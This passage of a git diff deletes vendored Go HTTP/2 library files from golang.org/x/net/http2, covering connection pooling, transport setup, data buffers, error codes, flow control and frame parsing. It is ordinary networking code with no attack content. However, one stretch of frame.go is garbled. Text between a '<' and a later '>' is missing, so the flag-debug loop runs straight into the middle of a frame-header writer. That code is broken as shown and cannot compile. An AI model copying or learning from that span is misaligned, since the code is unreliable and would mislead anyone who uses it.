cipher_TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384, - cipher_TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384, - cipher_TLS_RSA_WITH_AES_128_CCM, - cipher_TLS_RSA_WITH_AES_256_CCM, - cipher_TLS_RSA_WITH_AES_128_CCM_8, - cipher_TLS_RSA_WITH_AES_256_CCM_8, - cipher_TLS_PSK_WITH_AES_128_CCM, - cipher_TLS_PSK_WITH_AES_256_CCM, - cipher_TLS_PSK_WITH_AES_128_CCM_8, - cipher_TLS_PSK_WITH_AES_256_CCM_8: - return true - default: - return false - } -} diff --git a/vendor/golang.org/x/net/http2/client_conn_pool.go b/vendor/golang.org/x/net/http2/client_conn_pool.go deleted file mode 100644 index bdf5652b..00000000 --- a/vendor/golang.org/x/net/http2/client_conn_pool.go +++ /dev/null @@ -1,256 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Transport code's client connection pooling. - -package http2 - -import ( - "crypto/tls" - "net/http" - "sync" -) - -// ClientConnPool manages a pool of HTTP/2 client connections. -type ClientConnPool interface { - GetClientConn(req *http.Request, addr string) (*ClientConn, error) - MarkDead(*ClientConn) -} - -// clientConnPoolIdleCloser is the interface implemented by ClientConnPool -// implementations which can close their idle connections. -type clientConnPoolIdleCloser interface { - ClientConnPool - closeIdleConnections() -} - -var ( - _ clientConnPoolIdleCloser = (*clientConnPool)(nil) - _ clientConnPoolIdleCloser = noDialClientConnPool{} -) - -// TODO: use singleflight for dialing and addConnCalls? -type clientConnPool struct { - t *Transport - - mu sync.Mutex // TODO: maybe switch to RWMutex - // TODO: add support for sharing conns based on cert names - // (e.g. share conn for googleapis.com and appspot.com) - conns map[string][]*ClientConn // key is host:port - dialing map[string]*dialCall // currently in-flight dials - keys map[*ClientConn][]string - addConnCalls map[string]*addConnCall // in-flight addConnIfNeede calls -} - -func (p *clientConnPool) GetClientConn(req *http.Request, addr string) (*ClientConn, error) { - return p.getClientConn(req, addr, dialOnMiss) -} - -const ( - dialOnMiss = true - noDialOnMiss = false -) - -func (p *clientConnPool) getClientConn(req *http.Request, addr string, dialOnMiss bool) (*ClientConn, error) { - if isConnectionCloseRequest(req) && dialOnMiss { - // It gets its own connection. - const singleUse = true - cc, err := p.t.dialClientConn(addr, singleUse) - if err != nil { - return nil, err - } - return cc, nil - } - p.mu.Lock() - for _, cc := range p.conns[addr] { - if cc.CanTakeNewRequest() { - p.mu.Unlock() - return cc, nil - } - } - if !dialOnMiss { - p.mu.Unlock() - return nil, ErrNoCachedConn - } - call := p.getStartDialLocked(addr) - p.mu.Unlock() - <-call.done - return call.res, call.err -} - -// dialCall is an in-flight Transport dial call to a host. -type dialCall struct { - p *clientConnPool - done chan struct{} // closed when done - res *ClientConn // valid after done is closed - err error // valid after done is closed -} - -// requires p.mu is held. -func (p *clientConnPool) getStartDialLocked(addr string) *dialCall { - if call, ok := p.dialing[addr]; ok { - // A dial is already in-flight. Don't start another. - return call - } - call := &dialCall{p: p, done: make(chan struct{})} - if p.dialing == nil { - p.dialing = make(map[string]*dialCall) - } - p.dialing[addr] = call - go call.dial(addr) - return call -} - -// run in its own goroutine. -func (c *dialCall) dial(addr string) { - const singleUse = false // shared conn - c.res, c.err = c.p.t.dialClientConn(addr, singleUse) - close(c.done) - - c.p.mu.Lock() - delete(c.p.dialing, addr) - if c.err == nil { - c.p.addConnLocked(addr, c.res) - } - c.p.mu.Unlock() -} - -// addConnIfNeeded makes a NewClientConn out of c if a connection for key doesn't -// already exist. It coalesces concurrent calls with the same key. -// This is used by the http1 Transport code when it creates a new connection. Because -// the http1 Transport doesn't de-dup TCP dials to outbound hosts (because it doesn't know -// the protocol), it can get into a situation where it has multiple TLS connections. -// This code decides which ones live or die. -// The return value used is whether c was used. -// c is never closed. -func (p *clientConnPool) addConnIfNeeded(key string, t *Transport, c *tls.Conn) (used bool, err error) { - p.mu.Lock() - for _, cc := range p.conns[key] { - if cc.CanTakeNewRequest() { - p.mu.Unlock() - return false, nil - } - } - call, dup := p.addConnCalls[key] - if !dup { - if p.addConnCalls == nil { - p.addConnCalls = make(map[string]*addConnCall) - } - call = &addConnCall{ - p: p, - done: make(chan struct{}), - } - p.addConnCalls[key] = call - go call.run(t, key, c) - } - p.mu.Unlock() - - <-call.done - if call.err != nil { - return false, call.err - } - return !dup, nil -} - -type addConnCall struct { - p *clientConnPool - done chan struct{} // closed when done - err error -} - -func (c *addConnCall) run(t *Transport, key string, tc *tls.Conn) { - cc, err := t.NewClientConn(tc) - - p := c.p - p.mu.Lock() - if err != nil { - c.err = err - } else { - p.addConnLocked(key, cc) - } - delete(p.addConnCalls, key) - p.mu.Unlock() - close(c.done) -} - -func (p *clientConnPool) addConn(key string, cc *ClientConn) { - p.mu.Lock() - p.addConnLocked(key, cc) - p.mu.Unlock() -} - -// p.mu must be held -func (p *clientConnPool) addConnLocked(key string, cc *ClientConn) { - for _, v := range p.conns[key] { - if v == cc { - return - } - } - if p.conns == nil { - p.conns = make(map[string][]*ClientConn) - } - if p.keys == nil { - p.keys = make(map[*ClientConn][]string) - } - p.conns[key] = append(p.conns[key], cc) - p.keys[cc] = append(p.keys[cc], key) -} - -func (p *clientConnPool) MarkDead(cc *ClientConn) { - p.mu.Lock() - defer p.mu.Unlock() - for _, key := range p.keys[cc] { - vv, ok := p.conns[key] - if !ok { - continue - } - newList := filterOutClientConn(vv, cc) - if len(newList) > 0 { - p.conns[key] = newList - } else { - delete(p.conns, key) - } - } - delete(p.keys, cc) -} - -func (p *clientConnPool) closeIdleConnections() { - p.mu.Lock() - defer p.mu.Unlock() - // TODO: don't close a cc if it was just added to the pool - // milliseconds ago and has never been used. There's currently - // a small race window with the HTTP/1 Transport's integration - // where it can add an idle conn just before using it, and - // somebody else can concurrently call CloseIdleConns and - // break some caller's RoundTrip. - for _, vv := range p.conns { - for _, cc := range vv { - cc.closeIfIdle() - } - } -} - -func filterOutClientConn(in []*ClientConn, exclude *ClientConn) []*ClientConn { - out := in[:0] - for _, v := range in { - if v != exclude { - out = append(out, v) - } - } - // If we filtered it out, zero out the last item to prevent - // the GC from seeing it. - if len(in) != len(out) { - in[len(in)-1] = nil - } - return out -} - -// noDialClientConnPool is an implementation of http2.ClientConnPool -// which never dials. We let the HTTP/1.1 client dial and use its TLS -// connection instead. -type noDialClientConnPool struct{ *clientConnPool } - -func (p noDialClientConnPool) GetClientConn(req *http.Request, addr string) (*ClientConn, error) { - return p.getClientConn(req, addr, noDialOnMiss) -} diff --git a/vendor/golang.org/x/net/http2/configure_transport.go b/vendor/golang.org/x/net/http2/configure_transport.go deleted file mode 100644 index b65fc6d4..00000000 --- a/vendor/golang.org/x/net/http2/configure_transport.go +++ /dev/null @@ -1,80 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.6 - -package http2 - -import ( - "crypto/tls" - "fmt" - "net/http" -) - -func configureTransport(t1 *http.Transport) (*Transport, error) { - connPool := new(clientConnPool) - t2 := &Transport{ - ConnPool: noDialClientConnPool{connPool}, - t1: t1, - } - connPool.t = t2 - if err := registerHTTPSProtocol(t1, noDialH2RoundTripper{t2}); err != nil { - return nil, err - } - if t1.TLSClientConfig == nil { - t1.TLSClientConfig = new(tls.Config) - } - if !strSliceContains(t1.TLSClientConfig.NextProtos, "h2") { - t1.TLSClientConfig.NextProtos = append([]string{"h2"}, t1.TLSClientConfig.NextProtos...) - } - if !strSliceContains(t1.TLSClientConfig.NextProtos, "http/1.1") { - t1.TLSClientConfig.NextProtos = append(t1.TLSClientConfig.NextProtos, "http/1.1") - } - upgradeFn := func(authority string, c *tls.Conn) http.RoundTripper { - addr := authorityAddr("https", authority) - if used, err := connPool.addConnIfNeeded(addr, t2, c); err != nil { - go c.Close() - return erringRoundTripper{err} - } else if !used { - // Turns out we don't need this c. - // For example, two goroutines made requests to the same host - // at the same time, both kicking off TCP dials. (since protocol - // was unknown) - go c.Close() - } - return t2 - } - if m := t1.TLSNextProto; len(m) == 0 { - t1.TLSNextProto = map[string]func(string, *tls.Conn) http.RoundTripper{ - "h2": upgradeFn, - } - } else { - m["h2"] = upgradeFn - } - return t2, nil -} - -// registerHTTPSProtocol calls Transport.RegisterProtocol but -// converting panics into errors. -func registerHTTPSProtocol(t *http.Transport, rt http.RoundTripper) (err error) { - defer func() { - if e := recover(); e != nil { - err = fmt.Errorf("%v", e) - } - }() - t.RegisterProtocol("https", rt) - return nil -} - -// noDialH2RoundTripper is a RoundTripper which only tries to complete the request -// if there's already has a cached connection to the host. -type noDialH2RoundTripper struct{ t *Transport } - -func (rt noDialH2RoundTripper) RoundTrip(req *http.Request) (*http.Response, error) { - res, err := rt.t.RoundTrip(req) - if err == ErrNoCachedConn { - return nil, http.ErrSkipAltProtocol - } - return res, err -} diff --git a/vendor/golang.org/x/net/http2/databuffer.go b/vendor/golang.org/x/net/http2/databuffer.go deleted file mode 100644 index a3067f8d..00000000 --- a/vendor/golang.org/x/net/http2/databuffer.go +++ /dev/null @@ -1,146 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "errors" - "fmt" - "sync" -) - -// Buffer chunks are allocated from a pool to reduce pressure on GC. -// The maximum wasted space per dataBuffer is 2x the largest size class, -// which happens when the dataBuffer has multiple chunks and there is -// one unread byte in both the first and last chunks. We use a few size -// classes to minimize overheads for servers that typically receive very -// small request bodies. -// -// TODO: Benchmark to determine if the pools are necessary. The GC may have -// improved enough that we can instead allocate chunks like this: -// make([]byte, max(16<<10, expectedBytesRemaining)) -var ( - dataChunkSizeClasses = []int{ - 1 << 10, - 2 << 10, - 4 << 10, - 8 << 10, - 16 << 10, - } - dataChunkPools = [...]sync.Pool{ - {New: func() interface{} { return make([]byte, 1<<10) }}, - {New: func() interface{} { return make([]byte, 2<<10) }}, - {New: func() interface{} { return make([]byte, 4<<10) }}, - {New: func() interface{} { return make([]byte, 8<<10) }}, - {New: func() interface{} { return make([]byte, 16<<10) }}, - } -) - -func getDataBufferChunk(size int64) []byte { - i := 0 - for ; i < len(dataChunkSizeClasses)-1; i++ { - if size <= int64(dataChunkSizeClasses[i]) { - break - } - } - return dataChunkPools[i].Get().([]byte) -} - -func putDataBufferChunk(p []byte) { - for i, n := range dataChunkSizeClasses { - if len(p) == n { - dataChunkPools[i].Put(p) - return - } - } - panic(fmt.Sprintf("unexpected buffer len=%v", len(p))) -} - -// dataBuffer is an io.ReadWriter backed by a list of data chunks. -// Each dataBuffer is used to read DATA frames on a single stream. -// The buffer is divided into chunks so the server can limit the -// total memory used by a single connection without limiting the -// request body size on any single stream. -type dataBuffer struct { - chunks [][]byte - r int // next byte to read is chunks[0][r] - w int // next byte to write is chunks[len(chunks)-1][w] - size int // total buffered bytes - expected int64 // we expect at least this many bytes in future Write calls (ignored if <= 0) -} - -var errReadEmpty = errors.New("read from empty dataBuffer") - -// Read copies bytes from the buffer into p. -// It is an error to read when no data is available. -func (b *dataBuffer) Read(p []byte) (int, error) { - if b.size == 0 { - return 0, errReadEmpty - } - var ntotal int - for len(p) > 0 && b.size > 0 { - readFrom := b.bytesFromFirstChunk() - n := copy(p, readFrom) - p = p[n:] - ntotal += n - b.r += n - b.size -= n - // If the first chunk has been consumed, advance to the next chunk. - if b.r == len(b.chunks[0]) { - putDataBufferChunk(b.chunks[0]) - end := len(b.chunks) - 1 - copy(b.chunks[:end], b.chunks[1:]) - b.chunks[end] = nil - b.chunks = b.chunks[:end] - b.r = 0 - } - } - return ntotal, nil -} - -func (b *dataBuffer) bytesFromFirstChunk() []byte { - if len(b.chunks) == 1 { - return b.chunks[0][b.r:b.w] - } - return b.chunks[0][b.r:] -} - -// Len returns the number of bytes of the unread portion of the buffer. -func (b *dataBuffer) Len() int { - return b.size -} - -// Write appends p to the buffer. -func (b *dataBuffer) Write(p []byte) (int, error) { - ntotal := len(p) - for len(p) > 0 { - // If the last chunk is empty, allocate a new chunk. Try to allocate - // enough to fully copy p plus any additional bytes we expect to - // receive. However, this may allocate less than len(p). - want := int64(len(p)) - if b.expected > want { - want = b.expected - } - chunk := b.lastChunkOrAlloc(want) - n := copy(chunk[b.w:], p) - p = p[n:] - b.w += n - b.size += n - b.expected -= int64(n) - } - return ntotal, nil -} - -func (b *dataBuffer) lastChunkOrAlloc(want int64) []byte { - if len(b.chunks) != 0 { - last := b.chunks[len(b.chunks)-1] - if b.w < len(last) { - return last - } - } - chunk := getDataBufferChunk(want) - b.chunks = append(b.chunks, chunk) - b.w = 0 - return chunk -} diff --git a/vendor/golang.org/x/net/http2/errors.go b/vendor/golang.org/x/net/http2/errors.go deleted file mode 100644 index 71f2c463..00000000 --- a/vendor/golang.org/x/net/http2/errors.go +++ /dev/null @@ -1,133 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "errors" - "fmt" -) - -// An ErrCode is an unsigned 32-bit error code as defined in the HTTP/2 spec. -type ErrCode uint32 - -const ( - ErrCodeNo ErrCode = 0x0 - ErrCodeProtocol ErrCode = 0x1 - ErrCodeInternal ErrCode = 0x2 - ErrCodeFlowControl ErrCode = 0x3 - ErrCodeSettingsTimeout ErrCode = 0x4 - ErrCodeStreamClosed ErrCode = 0x5 - ErrCodeFrameSize ErrCode = 0x6 - ErrCodeRefusedStream ErrCode = 0x7 - ErrCodeCancel ErrCode = 0x8 - ErrCodeCompression ErrCode = 0x9 - ErrCodeConnect ErrCode = 0xa - ErrCodeEnhanceYourCalm ErrCode = 0xb - ErrCodeInadequateSecurity ErrCode = 0xc - ErrCodeHTTP11Required ErrCode = 0xd -) - -var errCodeName = map[ErrCode]string{ - ErrCodeNo: "NO_ERROR", - ErrCodeProtocol: "PROTOCOL_ERROR", - ErrCodeInternal: "INTERNAL_ERROR", - ErrCodeFlowControl: "FLOW_CONTROL_ERROR", - ErrCodeSettingsTimeout: "SETTINGS_TIMEOUT", - ErrCodeStreamClosed: "STREAM_CLOSED", - ErrCodeFrameSize: "FRAME_SIZE_ERROR", - ErrCodeRefusedStream: "REFUSED_STREAM", - ErrCodeCancel: "CANCEL", - ErrCodeCompression: "COMPRESSION_ERROR", - ErrCodeConnect: "CONNECT_ERROR", - ErrCodeEnhanceYourCalm: "ENHANCE_YOUR_CALM", - ErrCodeInadequateSecurity: "INADEQUATE_SECURITY", - ErrCodeHTTP11Required: "HTTP_1_1_REQUIRED", -} - -func (e ErrCode) String() string { - if s, ok := errCodeName[e]; ok { - return s - } - return fmt.Sprintf("unknown error code 0x%x", uint32(e)) -} - -// ConnectionError is an error that results in the termination of the -// entire connection. -type ConnectionError ErrCode - -func (e ConnectionError) Error() string { return fmt.Sprintf("connection error: %s", ErrCode(e)) } - -// StreamError is an error that only affects one stream within an -// HTTP/2 connection. -type StreamError struct { - StreamID uint32 - Code ErrCode - Cause error // optional additional detail -} - -func streamError(id uint32, code ErrCode) StreamError { - return StreamError{StreamID: id, Code: code} -} - -func (e StreamError) Error() string { - if e.Cause != nil { - return fmt.Sprintf("stream error: stream ID %d; %v; %v", e.StreamID, e.Code, e.Cause) - } - return fmt.Sprintf("stream error: stream ID %d; %v", e.StreamID, e.Code) -} - -// 6.9.1 The Flow Control Window -// "If a sender receives a WINDOW_UPDATE that causes a flow control -// window to exceed this maximum it MUST terminate either the stream -// or the connection, as appropriate. For streams, [...]; for the -// connection, a GOAWAY frame with a FLOW_CONTROL_ERROR code." -type goAwayFlowError struct{} - -func (goAwayFlowError) Error() string { return "connection exceeded flow control window size" } - -// connError represents an HTTP/2 ConnectionError error code, along -// with a string (for debugging) explaining why. -// -// Errors of this type are only returned by the frame parser functions -// and converted into ConnectionError(Code), after stashing away -// the Reason into the Framer's errDetail field, accessible via -// the (*Framer).ErrorDetail method. -type connError struct { - Code ErrCode // the ConnectionError error code - Reason string // additional reason -} - -func (e connError) Error() string { - return fmt.Sprintf("http2: connection error: %v: %v", e.Code, e.Reason) -} - -type pseudoHeaderError string - -func (e pseudoHeaderError) Error() string { - return fmt.Sprintf("invalid pseudo-header %q", string(e)) -} - -type duplicatePseudoHeaderError string - -func (e duplicatePseudoHeaderError) Error() string { - return fmt.Sprintf("duplicate pseudo-header %q", string(e)) -} - -type headerFieldNameError string - -func (e headerFieldNameError) Error() string { - return fmt.Sprintf("invalid header field name %q", string(e)) -} - -type headerFieldValueError string - -func (e headerFieldValueError) Error() string { - return fmt.Sprintf("invalid header field value %q", string(e)) -} - -var ( - errMixPseudoHeaderTypes = errors.New("mix of request and response pseudo headers") - errPseudoAfterRegular = errors.New("pseudo header field after regular") -) diff --git a/vendor/golang.org/x/net/http2/flow.go b/vendor/golang.org/x/net/http2/flow.go deleted file mode 100644 index 957de254..00000000 --- a/vendor/golang.org/x/net/http2/flow.go +++ /dev/null @@ -1,50 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Flow control - -package http2 - -// flow is the flow control window's size. -type flow struct { - // n is the number of DATA bytes we're allowed to send. - // A flow is kept both on a conn and a per-stream. - n int32 - - // conn points to the shared connection-level flow that is - // shared by all streams on that conn. It is nil for the flow - // that's on the conn directly. - conn *flow -} - -func (f *flow) setConnFlow(cf *flow) { f.conn = cf } - -func (f *flow) available() int32 { - n := f.n - if f.conn != nil && f.conn.n < n { - n = f.conn.n - } - return n -} - -func (f *flow) take(n int32) { - if n > f.available() { - panic("internal error: took too much") - } - f.n -= n - if f.conn != nil { - f.conn.n -= n - } -} - -// add adds n bytes (positive or negative) to the flow control window. -// It returns false if the sum would exceed 2^31-1. -func (f *flow) add(n int32) bool { - remain := (1<<31 - 1) - f.n - if n > remain { - return false - } - f.n += n - return true -} diff --git a/vendor/golang.org/x/net/http2/frame.go b/vendor/golang.org/x/net/http2/frame.go deleted file mode 100644 index 3b148907..00000000 --- a/vendor/golang.org/x/net/http2/frame.go +++ /dev/null @@ -1,1579 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "bytes" - "encoding/binary" - "errors" - "fmt" - "io" - "log" - "strings" - "sync" - - "golang.org/x/net/http2/hpack" - "golang.org/x/net/lex/httplex" -) - -const frameHeaderLen = 9 - -var padZeros = make([]byte, 255) // zeros for padding - -// A FrameType is a registered frame type as defined in -// http://http2.github.io/http2-spec/#rfc.section.11.2 -type FrameType uint8 - -const ( - FrameData FrameType = 0x0 - FrameHeaders FrameType = 0x1 - FramePriority FrameType = 0x2 - FrameRSTStream FrameType = 0x3 - FrameSettings FrameType = 0x4 - FramePushPromise FrameType = 0x5 - FramePing FrameType = 0x6 - FrameGoAway FrameType = 0x7 - FrameWindowUpdate FrameType = 0x8 - FrameContinuation FrameType = 0x9 -) - -var frameName = map[FrameType]string{ - FrameData: "DATA", - FrameHeaders: "HEADERS", - FramePriority: "PRIORITY", - FrameRSTStream: "RST_STREAM", - FrameSettings: "SETTINGS", - FramePushPromise: "PUSH_PROMISE", - FramePing: "PING", - FrameGoAway: "GOAWAY", - FrameWindowUpdate: "WINDOW_UPDATE", - FrameContinuation: "CONTINUATION", -} - -func (t FrameType) String() string { - if s, ok := frameName[t]; ok { - return s - } - return fmt.Sprintf("UNKNOWN_FRAME_TYPE_%d", uint8(t)) -} - -// Flags is a bitmask of HTTP/2 flags. -// The meaning of flags varies depending on the frame type. -type Flags uint8 - -// Has reports whether f contains all (0 or more) flags in v. -func (f Flags) Has(v Flags) bool { - return (f & v) == v -} - -// Frame-specific FrameHeader flag bits. -const ( - // Data Frame - FlagDataEndStream Flags = 0x1 - FlagDataPadded Flags = 0x8 - - // Headers Frame - FlagHeadersEndStream Flags = 0x1 - FlagHeadersEndHeaders Flags = 0x4 - FlagHeadersPadded Flags = 0x8 - FlagHeadersPriority Flags = 0x20 - - // Settings Frame - FlagSettingsAck Flags = 0x1 - - // Ping Frame - FlagPingAck Flags = 0x1 - - // Continuation Frame - FlagContinuationEndHeaders Flags = 0x4 - - FlagPushPromiseEndHeaders Flags = 0x4 - FlagPushPromisePadded Flags = 0x8 -) - -var flagName = map[FrameType]map[Flags]string{ - FrameData: { - FlagDataEndStream: "END_STREAM", - FlagDataPadded: "PADDED", - }, - FrameHeaders: { - FlagHeadersEndStream: "END_STREAM", - FlagHeadersEndHeaders: "END_HEADERS", - FlagHeadersPadded: "PADDED", - FlagHeadersPriority: "PRIORITY", - }, - FrameSettings: { - FlagSettingsAck: "ACK", - }, - FramePing: { - FlagPingAck: "ACK", - }, - FrameContinuation: { - FlagContinuationEndHeaders: "END_HEADERS", - }, - FramePushPromise: { - FlagPushPromiseEndHeaders: "END_HEADERS", - FlagPushPromisePadded: "PADDED", - }, -} - -// a frameParser parses a frame given its FrameHeader and payload -// bytes. The length of payload will always equal fh.Length (which -// might be 0). -type frameParser func(fc *frameCache, fh FrameHeader, payload []byte) (Frame, error) - -var frameParsers = map[FrameType]frameParser{ - FrameData: parseDataFrame, - FrameHeaders: parseHeadersFrame, - FramePriority: parsePriorityFrame, - FrameRSTStream: parseRSTStreamFrame, - FrameSettings: parseSettingsFrame, - FramePushPromise: parsePushPromise, - FramePing: parsePingFrame, - FrameGoAway: parseGoAwayFrame, - FrameWindowUpdate: parseWindowUpdateFrame, - FrameContinuation: parseContinuationFrame, -} - -func typeFrameParser(t FrameType) frameParser { - if f := frameParsers[t]; f != nil { - return f - } - return parseUnknownFrame -} - -// A FrameHeader is the 9 byte header of all HTTP/2 frames. -// -// See http://http2.github.io/http2-spec/#FrameHeader -type FrameHeader struct { - valid bool // caller can access []byte fields in the Frame - - // Type is the 1 byte frame type. There are ten standard frame - // types, but extension frame types may be written by WriteRawFrame - // and will be returned by ReadFrame (as UnknownFrame). - Type FrameType - - // Flags are the 1 byte of 8 potential bit flags per frame. - // They are specific to the frame type. - Flags Flags - - // Length is the length of the frame, not including the 9 byte header. - // The maximum size is one byte less than 16MB (uint24), but only - // frames up to 16KB are allowed without peer agreement. - Length uint32 - - // StreamID is which stream this frame is for. Certain frames - // are not stream-specific, in which case this field is 0. - StreamID uint32 -} - -// Header returns h. It exists so FrameHeaders can be embedded in other -// specific frame types and implement the Frame interface. -func (h FrameHeader) Header() FrameHeader { return h } - -func (h FrameHeader) String() string { - var buf bytes.Buffer - buf.WriteString("[FrameHeader ") - h.writeDebug(&buf) - buf.WriteByte(']') - return buf.String() -} - -func (h FrameHeader) writeDebug(buf *bytes.Buffer) { - buf.WriteString(h.Type.String()) - if h.Flags != 0 { - buf.WriteString(" flags=") - set := 0 - for i := uint8(0); i < 8; i++ { - if h.Flags&(1< 1 { - buf.WriteByte('|') - } - name := flagName[h.Type][Flags(1<>24), - byte(streamID>>16), - byte(streamID>>8), - byte(streamID)) -} - -func (f *Framer) endWrite() error { - // Now that we know the final size, fill in the FrameHeader in - // the space previously reserved for it. Abuse append. - length := len(f.wbuf) - frameHeaderLen - if length >= (1 << 24) { - return ErrFrameTooLarge - } - _ = append(f.wbuf[:0], - byte(length>>16), - byte(length>>8), - byte(length)) - if f.logWrites { - f.logWrite() - } - - n, err := f.w.Write(f.wbuf) - if err == nil && n != len(f.wbuf) { - err = io.ErrShortWrite - } - return err -} - -func (f *Framer) logWrite() { - if f.debugFramer == nil { - f.debugFramerBuf = new(bytes.Buffer) - f.debugFramer = NewFramer(nil, f.debugFramerBuf) - f.debugFramer.logReads = false // we log it ourselves, saying "wrote" below - // Let us read anything, even if we accidentally wrote it - // in the wrong order: - f.debugFramer.AllowIllegalReads = true - } - f.debugFramerBuf.Write(f.wbuf) - fr, err := f.debugFramer.ReadFrame() - if err != nil { - f.debugWriteLoggerf("http2: Framer %p: failed to decode just-written frame", f) - return - } - f.debugWriteLoggerf("http2: Framer %p: wrote %v", f, summarizeFrame(fr)) -} - -func (f *Framer) writeByte(v byte) { f.wbuf = append(f.wbuf, v) } -func (f *Framer) writeBytes(v []byte) { f.wbuf = append(f.wbuf, v...) } -func (f *Framer) writeUint16(v uint16) { f.wbuf = append(f.wbuf, byte(v>>8), byte(v)) } -func (f *Framer) writeUint32(v uint32) { - f.wbuf = append(f.wbuf, byte(v>>24), byte(v>>16), byte(v>>8), byte(v)) -} - -const ( - minMaxFrameSize = 1 << 14 - maxFrameSize = 1<<24 - 1 -) - -// SetReuseFrames allows the Framer to reuse Frames. -// If called on a Framer, Frames returned by calls to ReadFrame are only -// valid until the next call to ReadFrame. -func (fr *Framer) SetReuseFrames() { - if fr.frameCache != nil { - return - } - fr.frameCache = &frameCache{} -} - -type frameCache struct { - dataFrame DataFrame -} - -func (fc *frameCache) getDataFrame() *DataFrame { - if fc == nil { - return &DataFrame{} - } - return &fc.dataFrame -} - -// NewFramer returns a Framer that writes frames to w and reads them from r. -func NewFramer(w io.Writer, r io.Reader) *Framer { - fr := &Framer{ - w: w, - r: r, - logReads: logFrameReads, - logWrites: logFrameWrites, - debugReadLoggerf: log.Printf, - debugWriteLoggerf: log.Printf, - } - fr.getReadBuf = func(size uint32) []byte { - if cap(fr.readBuf) >= int(size) { - return fr.readBuf[:size] - } - fr.readBuf = make([]byte, size) - return fr.readBuf - } - fr.SetMaxReadFrameSize(maxFrameSize) - return fr -} - -// SetMaxReadFrameSize sets the maximum size of a frame -// that will be read by a subsequent call to ReadFrame. -// It is the caller's responsibility to advertise this -// limit with a SETTINGS frame. -func (fr *Framer) SetMaxReadFrameSize(v uint32) { - if v > maxFrameSize { - v = maxFrameSize - } - fr.maxReadSize = v -} - -// ErrorDetail returns a more detailed error of the last error -// returned by Framer.ReadFrame. For instance, if ReadFrame -// returns a StreamError with code PROTOCOL_ERROR, ErrorDetail -// will say exactly what was invalid. ErrorDetail is not guaranteed -// to return a non-nil value and like the rest of the http2 package, -// its return value is not protected by an API compatibility promise. -// ErrorDetail is reset after the next call to ReadFrame. -func (fr *Framer) ErrorDetail() error { - return fr.errDetail -} - -// ErrFrameTooLarge is returned from Framer.ReadFrame when the peer -// sends a frame that is larger than declared with SetMaxReadFrameSize. -var ErrFrameTooLarge = errors.New("http2: frame too large") - -// terminalReadFrameError reports whether err is an unrecoverable -// error from ReadFrame and no other frames should be read. -func terminalReadFrameError(err error) bool { - if _, ok := err.(StreamError); ok { - return false - } - return err != nil -} - -// ReadFrame reads a single frame. The returned Frame is only valid -// until the next call to ReadFrame. -// -// If the frame is larger than previously set with SetMaxReadFrameSize, the -// returned error is ErrFrameTooLarge. Other errors may be of type -// ConnectionError, StreamError, or anything else from the underlying -// reader. -func (fr *Framer) ReadFrame() (Frame, error) { - fr.errDetail = nil - if fr.lastFrame != nil { - fr.lastFrame.invalidate() - } - fh, err := readFrameHeader(fr.headerBuf[:], fr.r) - if err != nil { - return nil, err - } - if fh.Length > fr.maxReadSize { - return nil, ErrFrameTooLarge - } - payload := fr.getReadBuf(fh.Length) - if _, err := io.ReadFull(fr.r, payload); err != nil { - return nil, err - } - f, err := typeFrameParser(fh.Type)(fr.frameCache, fh, payload) - if err != nil { - if ce, ok := err.(connError); ok { - return nil, fr.connError(ce.Code, ce.Reason) - } - return nil, err - } - if err := fr.checkFrameOrder(f); err != nil { - return nil, err - } - if fr.logReads { - fr.debugReadLoggerf("http2: Framer %p: read %v", fr, summarizeFrame(f)) - } - if fh.Type == FrameHeaders && fr.ReadMetaHeaders != nil { - return fr.readMetaFrame(f.(*HeadersFrame)) - } - return f, nil -} - -// connError returns ConnectionError(code) but first -// stashes away a public reason to the caller can optionally relay it -// to the peer before hanging up on them. This might help others debug -// their implementations. -func (fr *Framer) connError(code ErrCode, reason string) error { - fr.errDetail = errors.New(reason) - return ConnectionError(code) -} - -// checkFrameOrder reports an error if f is an invalid frame to return -// next from ReadFrame. Mostly it checks whether HEADERS and -// CONTINUATION frames are contiguous. -func (fr *Framer) checkFrameOrder(f Frame) error { - last := fr.lastFrame - fr.lastFrame = f - if fr.AllowIllegalReads { - return nil - } - - fh := f.Header() - if fr.lastHeaderStream != 0 { - if fh.Type != FrameContinuation { - return fr.connError(ErrCodeProtocol, - fmt.Sprintf("got %s for stream %d; expected CONTINUATION following %s for stream %d", - fh.Type, fh.StreamID, - last.Header().Type, fr.lastHeaderStream)) - } - if fh.StreamID != fr.lastHeaderStream { - return fr.connError(ErrCodeProtocol, - fmt.Sprintf("got CONTINUATION for stream %d; expected stream 